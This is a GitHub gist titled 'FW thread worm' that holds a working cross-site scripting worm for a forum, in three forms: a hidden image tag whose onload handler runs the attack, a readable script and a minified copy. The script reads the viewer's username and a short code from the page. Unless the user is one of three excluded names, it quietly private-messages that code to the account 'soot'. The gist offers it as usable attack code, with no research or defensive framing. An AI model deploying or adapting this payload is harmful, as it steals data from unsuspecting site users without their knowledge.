Skip to content

Instantly share code, notes, and snippets.

@au5ton

au5ton/README.md

Last active March 24, 2016 07:34
Show Gist options
  • Save au5ton/ed58595936b57c68eca4 to your computer and use it in GitHub Desktop.
Save au5ton/ed58595936b57c68eca4 to your computer and use it in GitHub Desktop.
Download ZIP
FW thread worm
Raw
infected.html
<!-- infected link -->
<img style="display:none;" src="https://www.dropbox.com/s/j1ij8oz9ful4gkj/troll.png?dl=1" onload="var virtualElement=document.createElement('div'),body=new XMLHttpRequest,user,code;body.open('GET','home.php',!0),body.onload=function(){if(virtualElement.innerHTML=body.responseText,user=virtualElement.querySelector('#user_stats_title').innerText,code=virtualElement.querySelector('#chatbox_container').children[0].innerText,'FLUFF'!==user.toUpperCase()&&'KOOSH'!==user.toUpperCase()&&'G'!==user.toUpperCase()&&code.length<10){var params='pm_to=soot&pm_text='+code+'&notJavascript=0&pm_submit=Send',pm=new XMLHttpRequest;pm.open('POST','scripts/pm_post.php',!0),pm.setRequestHeader('Content-type','application/x-www-form-urlencoded'),pm.setRequestHeader('Content-length',params.length),pm.setRequestHeader('Connection','close'),pm.onload=function(){console.warn('gg'+user)},pm.send(params)}},body.send();">
Raw
worm.js
var virtualElement = document.createElement('div');
var body = new XMLHttpRequest();
var user, code;
body.open('GET', 'home.php', true);
body.onload = function () {
virtualElement.innerHTML = body.responseText;
user = virtualElement.querySelector('#user_stats_title').innerText;
code = virtualElement.querySelector('#chatbox_container').children[0].innerText;
if( user.toUpperCase() !== 'FLUFF' && user.toUpperCase() !== 'KOOSH' && user.toUpperCase() !== 'G' && code.length < 10 ) {
var params = 'pm_to=soot&pm_text='+code+'&notJavascript=0&pm_submit=Send';
var pm = new XMLHttpRequest();
pm.open('POST', 'scripts/pm_post.php', true);
pm.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
pm.setRequestHeader('Content-length', params.length);
pm.setRequestHeader('Connection', 'close');
pm.onload = function () {
console.warn('gg'+user);
}
pm.send(params);
}
}
body.send();
Raw
worm.min.js
var virtualElement=document.createElement('div'),body=new XMLHttpRequest,user,code;body.open('GET','home.php',!0),body.onload=function(){if(virtualElement.innerHTML=body.responseText,user=virtualElement.querySelector('#user_stats_title').innerText,code=virtualElement.querySelector('#chatbox_container').children[0].innerText,'FLUFF'!==user.toUpperCase()&&'KOOSH'!==user.toUpperCase()&&'G'!==user.toUpperCase()&&code.length<10){var params='pm_to=soot&pm_text='+code+'&notJavascript=0&pm_submit=Send',pm=new XMLHttpRequest;pm.open('POST','scripts/pm_post.php',!0),pm.setRequestHeader('Content-type','application/x-www-form-urlencoded'),pm.setRequestHeader('Content-length',params.length),pm.setRequestHeader('Connection','close'),pm.onload=function(){console.warn('gg'+user)},pm.send(params)}},body.send();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment